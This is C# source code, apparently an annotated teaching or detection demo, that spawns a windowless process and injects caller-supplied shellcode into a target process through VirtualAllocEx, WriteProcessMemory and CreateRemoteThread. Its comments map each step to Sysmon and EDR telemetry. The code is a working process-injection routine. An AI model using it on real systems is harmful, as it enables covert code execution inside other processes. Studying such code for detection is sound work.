        /// <summary>
        /// Starts a new process via the P/Invoke wrapper <c>IMPORTS.CreateProcessA</c> and
        /// returns its process handle. The new process is created with
        /// <c>CREATE_NO_WINDOW</c>, so it has no console window of its own.
        /// </summary>
        /// <param name="processName">Passed as the command-line argument of CreateProcessA
        /// (the application-name argument is <c>null</c>).</param>
        /// <returns>The <c>hProcess</c> handle from PROCESS_INFORMATION. Note that the
        /// companion <c>hThread</c> handle is never closed or returned in this method.</returns>
        public static IntPtr SpawnNewProcess(string processName)
        {
            // STRUCTS / IMPORTS are project-declared P/Invoke wrappers (not visible here);
            // presumably they mirror the Win32 STARTUPINFO / PROCESS_INFORMATION layouts — verify.
            STRUCTS.STARTUPINFO         si = new STRUCTS.STARTUPINFO();
            STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();
            // No security attributes, no handle inheritance, no custom environment or working dir.
            bool success = IMPORTS.CreateProcessA(null, processName,
                                                  IntPtr.Zero, IntPtr.Zero, false,
                                                  STRUCTS.ProcessCreationFlags.CREATE_NO_WINDOW,
                                                  IntPtr.Zero, null, ref si, out pi);

            // 'success' is never inspected: the message and the handle are produced even when
            // CreateProcessA failed, in which case pi holds default (zero) values.
            // Defender note: this process start is ordinary process-creation telemetry
            // (e.g. Sysmon Event ID 1); the hidden-window flag is the only unusual attribute.
            Console.WriteLine("Process {0} Created! \n PID: {1}", processName, pi.dwProcessId);
            return(pi.hProcess);
        }
        /// <summary>
        /// Copies <paramref name="shellcode"/> into the address space of another process and
        /// starts a thread there at the copied bytes. Each step is gated on a key press, so the
        /// method is interactive and blocks on <see cref="Console.ReadKey()"/>.
        /// </summary>
        /// <param name="processHandle">Handle to the target process (e.g. the value returned by
        /// <c>SpawnNewProcess</c>); it must carry the access rights the three Win32 calls need.</param>
        /// <param name="shellcode">Bytes to write; <c>shellcode.Length</c> is used as the
        /// allocation and write size.</param>
        /// <remarks>
        /// Defender note: the three-call sequence below — a cross-process allocation that is
        /// both writable and executable, a remote memory write, and a remote thread whose start
        /// address is that allocation — is the canonical remote-injection pattern. It is exactly
        /// what endpoint telemetry such as Sysmon Event ID 8 (CreateRemoteThread) and EDR
        /// memory-protection monitoring is designed to surface; RWX private memory in a process
        /// that otherwise has none is a high-signal indicator during memory forensics.
        /// </remarks>
        public static void Inject(IntPtr processHandle, byte[] shellcode)
        {
            // Receives the byte count from WriteProcessMemory; it is never read afterwards.
            IntPtr written = IntPtr.Zero;

            Console.WriteLine("Hit a key to alloc memory");
            Console.ReadKey();
            // Reserve+commit a region of shellcode.Length bytes with PAGE_EXECUTE_READWRITE.
            // The returned address is not checked for IntPtr.Zero before being used below.
            IntPtr memoryaddr = IMPORTS.VirtualAllocEx(processHandle, IntPtr.Zero, (uint)(shellcode.Length), STRUCTS.AllocationType.Commit | STRUCTS.AllocationType.Reserve, STRUCTS.MemoryProtection.ExecuteReadWrite);

            Console.WriteLine("Hit a key to write memory");
            Console.ReadKey();
            // Return value (success/failure) is discarded; only 'written' is captured.
            IMPORTS.WriteProcessMemory(processHandle, memoryaddr, shellcode, shellcode.Length, out written);
            Console.WriteLine("Hit a key to create the thread and launch our shellcode!");
            Console.ReadKey();
            // Thread start address = the allocation; no thread parameter, default stack size,
            // no creation flags. The thread handle is discarded rather than closed.
            IMPORTS.CreateRemoteThread(processHandle, IntPtr.Zero, 0, memoryaddr, IntPtr.Zero, 0, IntPtr.Zero);
        }